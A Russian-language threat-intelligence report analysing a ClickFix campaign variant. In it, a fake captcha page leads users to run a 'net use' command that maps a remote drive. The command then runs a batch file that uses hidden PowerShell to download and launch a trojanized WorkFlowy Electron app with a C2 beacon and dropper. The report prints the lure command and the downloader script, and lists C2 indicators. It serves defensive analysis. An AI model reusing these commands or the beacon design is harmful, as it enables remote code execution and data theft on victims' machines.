ИНФОРМАЦИОННАЯ БЕЗОПАСНОСТЬ

Предупреждение: Настоящий отчет подготовлен Центром исследований угроз с целью повышения осведомленности о кибербезопасности и содействия укреплению защитных возможностей. Он основан на результатах независимых исследований и наблюдений за текущей ситуацией с угрозами, доступных на момент публикации. Содержание отчета предназначено исключительно для информационных целей и обеспечения готовности к угрозам.

Читайте другие блоги, посвященные аналитике угроз и исследованиям злоумышленников:

Исследователи Atos выявили новый вариант популярной техники ClickFix, при которой злоумышленники убеждают пользователя выполнить вредоносную команду на собственном устройстве с помощью сочетания клавиш Win + R. В этом варианте используется команда «net use» для подключения сетевого диска с внешнего сервера, после чего запускается пакетный файл «.cmd», размещенный на этом диске. Скрипт загружает ZIP-архив, распаковывает его и запускает легитимное приложение WorkFlowy с модифицированной вредоносной логикой, скрытой внутри архива «.asar». Это действует как C2-маяк и дроппер для конечной вредоносной нагрузки.

Рисунок 1: Общий обзор схемы атаки.

В этой версии начальный вектор атаки такой же, как и во всех остальных: веб-страница, маскирующаяся под механизм капчи — «happyglamper[.]ro». Она предлагает пользователю открыть приложение «Выполнить» с помощью «Win+R», а затем нажать «Ctrl+V» и «Enter».

Это запускает следующую команду:

«cmd.exe» /c net use Z: /persistent:no && «Z:\update.cmd» & net use Z: /delete

Обычно на этом этапе злоумышленники используют PowerShell или mshta для загрузки и запуска следующего этапа вредоносного ПО. Здесь же мы видим, что «net use» используется для сопоставления и подключения к сетевому диску внешнего сервера, с которого запускается пакетный скрипт. Хотя эти TTP не являются новыми, ранее они никогда не встречались в атаках ClickFix. В сочетании со следующими необычными этапами схем заражения эта кампания дает злоумышленникам высокие шансы обойти защитные меры и остаться незамеченными для защитников.

В данном случае наблюдаемый вариант потока выполнения ClickFix успешно обошел обнаружение Microsoft Defender for Endpoint. Команды безопасности Atos смогли обнаружить его только благодаря внутренней службе Threat Hunting, сосредоточенной на основном поведенческом аспекте техники ClickFix — первоначальном запуске через ключ реестра RunMRU (запрос для поиска доступен в разделе «Приложение»).

Скрипт первоначального запуска «update.cmd» загружается с подключенного диска и выполняется; после этого подключенный диск удаляется. Содержимое «update.cmd»:

start "" /min powershell -WindowStyle Hidden -Command "Invoke-WebRequest '' -OutFile \"$env:TEMP\dl.zip\";

Expand-Archive \"$env:TEMP\dl.zip\" -DestinationPath \"$env:LOCALAPPDATA\MyApp\" -Force;

Start-Process \"$env:LOCALAPPDATA\MyApp\WorkFlowy.exe\""

Это запускает экземпляр PowerShell, который загружает zip-архив и извлекает его в каталог «%LOCALAPPDATA%\MyApp\». Затем он запускает бинарный файл «WorkFlowy.exe».

Рисунок 4: Содержимое архива flowy.zip

Архив содержит настольное приложение WorkFlowy (версия 1.4.1050), подписанное разработчиком «FunRoutine Inc.», распространяемое в виде пакета приложения Electron. Приложения Electron написаны с использованием популярных веб-технологий — HTML, CSS и JavaScript — и используют архивы «.asar» для упаковки исходного кода при сборе приложения. Это делается по разным причинам, например, для устранения проблем, связанных с длинными именами путей в Windows. Вредоносный код был внедрен в файл main.js, точку входа приложения Node.js, скрытую внутри архива app.asar.

Целевое приложение WorkFlowy Desktop (Electron)

Вредоносный файл resources/app.asar → /main.js

Домен C2 cloudflare.report/forever/e/

IP-адрес источника C2 144[.]31[.]165[.]173 (Франкфурт, AS215439 play2go.cloud)

Дата регистрации домена январь 2026 г., регистрант из Гонконга, регистратор OnlineNIC

Каталог промежуточного хранения дроппера %TEMP%\[unix_timestamp]\

Вредоносный архив ASAR является прямой заменой легитимного файла resources/app.asar. Злоумышленник перепаковал старую версию приложения (v1.4 против текущей v4.3) с внедренным кодом.

Рисунок 5: Содержимое подкаталога «resources»

При запуске WorkFlowy ищет файл app.asar по относительному пути, жестко заданному в бинарном файле. Затем он считывает из него файл main.js, декодирует его в строку и передает на встроенный движок Google JavaScript V8, который его выполняет. Злоумышленники заменили легитимный файл main.js на файл, созданный ими самими. Вместо хорошо структурированных скриптов они использовали сильно обфусцированную однострочную структуру, добавив вредоносный код поверх легитимного, чтобы обеспечить его выполнение в первую очередь и заблокировать функциональность WorkFlowy.

Вредоносный код содержит несколько критически важных функций:

Вредоносная программа запускается до запуска легитимного приложения: внедренный IIFE открывается с await f() — бесконечным циклом C2-маяка. Поскольку f() никогда не разрешается, весь последующий легитимный код инициализации WorkFlowy блокируется навсегда. Вредоносная программа запускается с полными привилегиями Node.js сразу после запуска.

Постоянная идентификация жертвы через %APPDATA%\id.txt: при первом запуске генерируется случайный 8-символьный буквенно-цифровой идентификатор и записывается в %APPDATA%\id.txt. При последующих запусках сохраненный идентификатор считывается обратно, предоставляя злоумышленнику стабильный идентификатор для каждого компьютера жертвы на протяжении сеансов.

C2-маяк — выводит идентификационные данные хоста каждые 2 секунды: функция u() отправляет HTTP-запрос POST, содержащий уникальный ID жертвы, имя компьютера и имя пользователя Windows, на C2-сервер. Цикл в f() повторяет это бесконечно с интервалом в 2 секунды.

Удаленная загрузка и выполнение полезной нагрузки: функция p() получает объект задачи от C2, декодирует содержимое файла, закодированное в base64, записывает его в каталог с отметкой времени в %TEMP% и запускает любой .exe через child_process.exec.

Если соединение с C2 не установлено, файлы и каталоги не создаются. На момент проведения данного анализа домен C2 уже не отвечал.

Почему Electron является эффективным механизмом доставки

Вредоносный код запускается в главном процессе Node.js — вне песочницы Chromium — с полными привилегиями авторизованного пользователя, что позволяет ему выполнять любые действия, разрешенные пользователю в системе. Фактически на диск не записываются никакие файлы, а поскольку вредоносная полезная нагрузка упакована в архив «.asar», это дополнительно помогает скрыть вредоносный код.

С помощью дроппера не реализуется никакой персистентности на уровне ОС. Маяк работает только пока открыт WorkFlowy. Единственный артефакт, записываемый на диск перед доставкой следующего этапа, — это %APPDATA%\id.txt (идентификатор отслеживания жертвы), и это происходит только в том случае, если соединение с C2 установлено правильно. Предположительно, обеспечение персистентности на уровне ОС делегируется тому полезному грузу, который C2 доставляет через дроппер.